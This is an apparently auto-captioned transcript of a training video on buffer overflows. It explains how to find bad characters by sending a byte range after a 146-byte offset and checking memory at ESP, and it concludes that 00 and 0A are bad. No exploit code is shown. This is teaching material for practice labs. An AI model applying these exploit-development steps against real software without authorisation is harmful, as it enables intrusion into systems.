Finding Bad Characters
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
Already have an account? Sign In »
21 hours 43 minutes
finding bad characters
are learning objective is to understand how to find bad characters.
I did a lot of buffer overflow practice and I can tell you that the biggest mistake I made
was just skipping over this part.
Do not skip over this part. You'll thank me later. Finding bad characters is very important and I'll show you how
so now that we've figured out how to control the iP, I've written another program with bad characters. The thing is we don't know which characters will cause the program
to act in a certain way that we're not aware of. We typically skip
00 because that's the null byte which will terminate the remainder of the remainder of the shell code. So it's always a bad character. So I start with one, you'll notice I go all the way to ff here
and I'm using this to try to figure out if there is some character that if we put it in our shell code will cause the shell code do not work and crash the program and therefore us not get a shell.
So I will send this. You'll notice you know I have my offset of 146, I have my bees and now I'm adding all these bad characters to figure out which ones are bad.
So let's send this
and let's go back.
Let's see what we have. So obviously the program has crashed.
So I'll go to E. S. P.
And you can see here 123456789 21 21 21 21.
So we have an issue here. If we look
back at our script
it should be a B C D E F. And so on.
So let's take out the A.
should probably go back
and here and restart the program.
And the hope is that we see every character
without it causing it to not appear in memory.
So let's send this again.
so now we can I mean this is a manual review. There are ways you can do with Mona. I suggest you research that
but I do it the hard way. 123456789 B. C. D E. F.
And like we saw it goes all the way to ff
and it doesn't look like anything's missing or has caused to crash. I also have read the guide
and he tells me that the only bad characters are 00 and a zero.
So now I know what my bad characters are. Do not skip this. Do not skip this and make sure you carefully check
which characters are the bad characters. Because when you get to your shell code and you specify your bad characters and you miss one, it will cause your shell code not to work in the program to crash and you'll be wondering why. So
that's how to find bad characters.
So in summary, we should now understand how to find bad characters.
Buffer Overflow Attack